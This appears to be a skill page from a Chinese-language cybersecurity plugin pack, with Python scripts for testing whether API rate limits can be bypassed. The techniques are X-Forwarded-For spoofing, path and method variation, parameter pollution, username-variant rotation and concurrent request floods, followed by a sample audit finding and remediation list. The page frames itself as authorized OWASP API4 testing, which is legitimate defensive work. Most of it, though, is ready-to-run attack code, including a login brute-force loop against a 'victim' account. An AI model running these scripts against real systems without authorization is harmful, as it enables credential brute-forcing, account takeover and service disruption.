Tests API rate limiting bypass vulnerabilities via header manipulation (X-Forwarded-For spoofing), parameter pollution, case changes, path tricks, IP rotation, and method/version tweaks. For authorized security audits per OWASP API4:2023.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 测试 API 限速能否被绕过以实现对认证端点的暴力破解攻击
Tests API rate limiting for bypasses via header spoofing, parameter pollution, case variation, path manipulation, and encoding schemes. Maps to OWASP API4:2023 Unrestricted Resource Consumption.
Tests API rate limiting for bypass vulnerabilities via header manipulation, IP spoofing, parameter pollution, case variation, and path tricks. For OWASP API4:2023 and brute force/DoS assessment.
Implements API abuse detection with token bucket, sliding window, and adaptive rate limiting algorithms to prevent DDoS, brute force, and credential stuffing attacks. Uses Redis backend with Python example.
Share bugs, ideas, or general feedback.
不适用于 未经书面授权的场景。限速测试涉及发送大量请求,可能影响服务可用性。
requests、aiohttp 和 asyncio 库识别限速的实现方式:
import requests
import time
BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}
# 发送请求并跟踪限速响应头
def probe_rate_limit(endpoint, method="GET", count=100):
results = []
for i in range(count):
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers)
rate_headers = {
"limit": resp.headers.get("X-RateLimit-Limit") or resp.headers.get("X-Rate-Limit-Limit"),
"remaining": resp.headers.get("X-RateLimit-Remaining") or resp.headers.get("X-Rate-Limit-Remaining"),
"reset": resp.headers.get("X-RateLimit-Reset") or resp.headers.get("X-Rate-Limit-Reset"),
"retry_after": resp.headers.get("Retry-After"),
"status": resp.status_code
}
results.append(rate_headers)
if resp.status_code == 429:
print(f"第 {i+1} 次请求触发限速:{rate_headers}")
return results, i+1
time.sleep(0.05) # 小延迟以避免连接问题
print(f"{count} 次请求后未触发限速")
return results, count
# 测试关键端点
login_results, login_threshold = probe_rate_limit("/auth/login", "POST", 200)
api_results, api_threshold = probe_rate_limit("/users/me", "GET", 200)
search_results, search_threshold = probe_rate_limit("/search?q=test", "GET", 200)
print(f"\n限速摘要:")
print(f" 登录:第 {login_threshold} 次请求触发")
print(f" API:第 {api_threshold} 次请求触发")
print(f" 搜索:第 {search_threshold} 次请求触发")
# 绕过技术 1:基于请求头的 IP 欺骗
IP_SPOOFING_HEADERS = [
"X-Forwarded-For",
"X-Real-IP",
"X-Original-Forwarded-For",
"X-Originating-IP",
"X-Remote-IP",
"X-Remote-Addr",
"X-Client-IP",
"X-Host",
"X-Forwarded-Host",
"True-Client-IP",
"Cluster-Client-IP",
"X-ProxyUser-Ip",
"Forwarded",
"CF-Connecting-IP",
"Fastly-Client-IP",
"X-Azure-ClientIP",
"X-Akamai-Client-IP",
]
def test_ip_spoofing_bypass(endpoint, method="POST", body=None):
"""测试 IP 欺骗请求头是否可绕过限速。"""
# 首先用正常方式触发限速
for i in range(200):
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers, json=body)
if resp.status_code == 429:
print(f"第 {i+1} 次请求触发限速")
break
# 测试每个欺骗请求头
bypasses_found = []
for header in IP_SPOOFING_HEADERS:
spoofed_headers = {**headers, header: f"10.0.{i%256}.{(i*7)%256}"}
resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=spoofed_headers, json=body)
if resp.status_code != 429:
bypasses_found.append(header)
print(f"[绕过] {header} -> {resp.status_code}")
return bypasses_found
login_body = {"username": "test@example.com", "password": "wrongpassword"}
bypasses = test_ip_spoofing_bypass("/auth/login", "POST", login_body)
# 绕过技术 2:URL 路径变形
def test_path_variation_bypass(base_endpoint, token):
"""测试路径变形是否可绕过与特定端点绑定的限速。"""
variations = [
base_endpoint, # /api/v1/auth/login
base_endpoint + "/", # /api/v1/auth/login/
base_endpoint.upper(), # /API/V1/AUTH/LOGIN
base_endpoint + "?dummy=1", # /api/v1/auth/login?dummy=1
base_endpoint + "#fragment", # /api/v1/auth/login#fragment
base_endpoint + "%20", # /api/v1/auth/login%20
base_endpoint + "/..", # /api/v1/auth/login/..
base_endpoint.replace("/v1/", "/v2/"), # /api/v2/auth/login
base_endpoint + ";", # /api/v1/auth/login;
base_endpoint + "\t", # Tab 字符
base_endpoint + "%00", # 空字节
base_endpoint + "..;/", # Spring 路径穿越
]
# 先对原始端点触发限速
for i in range(200):
resp = requests.post(f"{BASE_URL}{base_endpoint}",
headers={"Authorization": f"Bearer {token}"},
json={"username": "test", "password": "wrong"})
if resp.status_code == 429:
break
# 测试各种变形
for variant in variations:
try:
resp = requests.post(f"{BASE_URL}{variant}",
headers={"Authorization": f"Bearer {token}"},
json={"username": "test", "password": "wrong"})
if resp.status_code != 429:
print(f"[绕过] 路径变形:{variant} -> {resp.status_code}")
except Exception:
pass
test_path_variation_bypass("/auth/login", "<token>")
# 绕过技术 3:方法和 Content-Type 切换
def test_method_bypass(endpoint, original_body):
"""测试限速是否与特定方法绑定。"""
methods_to_test = ["POST", "PUT", "PATCH", "GET", "OPTIONS"]
content_types = [
"application/json",
"application/x-www-form-urlencoded",
"multipart/form-data",
"text/plain",
"application/xml",
"text/xml",
]
# 用 POST + application/json 触发限速
for i in range(200):
resp = requests.post(f"{BASE_URL}{endpoint}",
headers={**headers, "Content-Type": "application/json"},
json=original_body)
if resp.status_code == 429:
break
# 测试其他方法
for method in methods_to_test:
if method == "POST":
continue
resp = requests.request(method, f"{BASE_URL}{endpoint}",
headers=headers, json=original_body)
if resp.status_code not in (429, 405):
print(f"[绕过] 切换方法到 {method}:{resp.status_code}")
# 测试其他 Content-Type
for ct in content_types:
if ct == "application/json":
continue
test_headers = {**headers, "Content-Type": ct}
if ct == "application/x-www-form-urlencoded":
data = "&".join(f"{k}={v}" for k, v in original_body.items())
resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers, data=data)
else:
resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers,
data=str(original_body))
if resp.status_code != 429:
print(f"[绕过] Content-Type {ct}:{resp.status_code}")
test_method_bypass("/auth/login", {"username": "test@example.com", "password": "wrong"})
# 绕过技术 4:轮换标识符以规避每账户限制
import string
import random
def test_account_rotation_bypass(login_endpoint, target_password_list):
"""测试限速是否针对每账户,通过轮换用户名可绕过。"""
target_email = "victim@example.com"
# 测试 1:通过轮换用户名字段的细微变体来绕过每账户限速
email_variations = [
target_email,
target_email.upper(),
f" {target_email}",
f"{target_email} ",
target_email.replace("@", "%40"),
f"+tag@".join(target_email.split("@")), # victim+tag@example.com
]
for password in target_password_list[:50]:
for email_var in email_variations:
resp = requests.post(f"{BASE_URL}{login_endpoint}",
json={"username": email_var, "password": password})
if resp.status_code == 200:
print(f"[成功] 登录成功:{email_var} / {password}")
return True
elif resp.status_code == 429:
print(f"变体触发限速:{email_var}")
# 小延迟
time.sleep(0.1)
return False
# 绕过技术 5:参数污染
def test_parameter_pollution_bypass(endpoint):
"""添加额外参数使每次请求看起来唯一。"""
for i in range(200):
random_param = ''.join(random.choices(string.ascii_lowercase, k=8))
resp = requests.post(
f"{BASE_URL}{endpoint}?{random_param}={i}",
headers=headers,
json={"username": "test@example.com", "password": f"attempt_{i}"}
)
if resp.status_code == 429:
print(f"参数污染在第 {i+1} 次请求时失败")
return False
print("[绕过] 参数污染:200 次请求未触发限速")
return True
import asyncio
import aiohttp
async def distributed_rate_limit_test(endpoint, total_requests=1000, concurrency=50):
"""在并发负载下测试限速。"""
results = {"success": 0, "rate_limited": 0, "errors": 0}
async def make_request(session, request_num):
try:
# 每次请求轮换 X-Forwarded-For
req_headers = {
**headers,
"X-Forwarded-For": f"192.168.{request_num % 256}.{(request_num * 3) % 256}"
}
async with session.post(
f"{BASE_URL}{endpoint}",
headers=req_headers,
json={"username": "test@example.com", "password": f"attempt_{request_num}"}
) as resp:
if resp.status == 429:
results["rate_limited"] += 1
elif resp.status in (200, 401):
results["success"] += 1
else:
results["errors"] += 1
except Exception:
results["errors"] += 1
connector = aiohttp.TCPConnector(limit=concurrency)
async with aiohttp.ClientSession(connector=connector) as session:
tasks = [make_request(session, i) for i in range(total_requests)]
await asyncio.gather(*tasks)
print(f"\n分布式测试结果:")
print(f" 成功:{results['success']}")
print(f" 被限速:{results['rate_limited']}")
print(f" 错误:{results['errors']}")
print(f" 绕过率:{results['success']/(results['success']+results['rate_limited'])*100:.1f}%")
# asyncio.run(distributed_rate_limit_test("/auth/login"))
| 术语 | 定义 |
|---|---|
| 限速(Rate Limiting) | 控制客户端在时间窗口内向 API 发送请求数量,通常按 IP、用户或 API 密钥执行 |
| 无限制资源消耗(Unrestricted Resource Consumption) | OWASP API4:2023 - 未适当限制请求的资源大小或数量的 API,可导致 DoS 或暴力破解攻击 |
| X-Forwarded-For 欺骗 | 操纵 X-Forwarded-For 请求头,使服务器认为请求来自不同的 IP 地址,从而绕过基于 IP 的限速 |
| 撞库攻击(Credential Stuffing) | 向登录端点自动注入被盗的用户名/密码对,需绕过限速才能大规模实施 |
| 令牌桶(Token Bucket) | 允许突发请求直至桶容量上限、以固定速率填充的限速算法 |
| 滑动窗口(Sliding Window) | 在滚动时间窗口内跟踪请求的限速算法,比固定窗口更能抵抗突发攻击 |
场景背景:某金融服务 API 在登录端点实施了限速以防止暴力破解攻击。安全团队在合规审计前需要验证这些控制措施的有效性。
方法:
POST /api/v1/auth/login 发送 100 次请求——每个 IP 每分钟第 10 次请求触发限速/api/v1/auth/login/(末尾斜杠)重置限速计数器/api/v2/auth/login 未配置限速(影子 API)?_=<随机值> 可绕过限速常见陷阱:
## 发现:通过 X-Forwarded-For 请求头欺骗绕过限速
**ID**:API-RATE-001
**严重性**:高(CVSS 7.3)
**OWASP API**:API4:2023 - 无限制资源消耗
**受影响端点**:
- POST /api/v1/auth/login
- POST /api/v1/auth/forgot-password
- POST /api/v1/auth/verify-mfa
**描述**:
API 限速实现依赖 X-Forwarded-For 请求头来识别客户端 IP 地址。
由于应用位于不对该请求头进行剥离或验证的负载均衡器后面,
攻击者可以设置任意 X-Forwarded-For 值,从而绕过认证端点
每分钟 10 次请求的速率限制。
**已确认的绕过方法**:
1. X-Forwarded-For 轮换:60 秒内 1000 次登录尝试(vs. 10 次限制)
2. 末尾斜杠路径变形:/auth/login/ 被视为独立端点
3. API v2 端点:未配置限速
4. 竞态条件:50 个并发请求,计数器更新前 45 个成功
**影响**:
攻击者可对任意用户账户执行无限制的暴力破解攻击,
绕过旨在防止撞库攻击的限速措施。
以每分钟 1000 次的速度,6 位 PIN 可在不到 17 分钟内被破解。
**修复建议**:
1. 配置负载均衡器设置 X-Forwarded-For,并剥离客户端提供的值
2. 在应用层基于已认证用户 ID(而非仅 IP)实施限速
3. 应用限速规则前规范化 URL 路径(去除末尾斜杠,统一大小写)
4. 在所有 API 版本和 Content-Type 上一致应用限速
5. 使用原子限速计数器(Redis INCR)防止竞态条件
6. 在硬性限制之外实施渐进式延迟(指数退避)